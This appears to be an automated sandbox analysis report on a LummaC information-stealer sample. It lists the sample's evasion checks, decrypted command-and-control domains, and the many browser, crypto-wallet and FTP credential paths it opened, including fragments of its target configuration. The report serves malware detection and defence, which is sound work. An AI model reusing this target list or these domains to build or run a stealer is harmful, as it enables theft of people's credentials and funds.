                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: rapeflowwj.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crosshuaht.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sustainskelet.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: aspecteirs.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: energyaffai.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacebudi.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: discokeyus.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: grannyejh.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375882794.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: sweepyribs.lat
                Source: tPSrcPbmRe.exe, 00000000.00000002.2375970033.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369333103.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375411067.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320002297.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2376803403.00000000012C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: tPSrcPbmRe.exe PID: 6480, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: tPSrcPbmRe.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: tPSrcPbmRe.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                Source: tPSrcPbmRe.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: tPSrcPbmRe.exeString found in binary or memory: "app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"
                Source: tPSrcPbmRe.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: tPSrcPbmRe.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: tPSrcPbmRe.exe, 00000000.00000003.2294184557.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]@
                Source: tPSrcPbmRe.exe, 00000000.00000003.2223056639.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets;!
                Source: tPSrcPbmRe.exeString found in binary or memory: keystore
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267157700.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\tPSrcPbmRe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
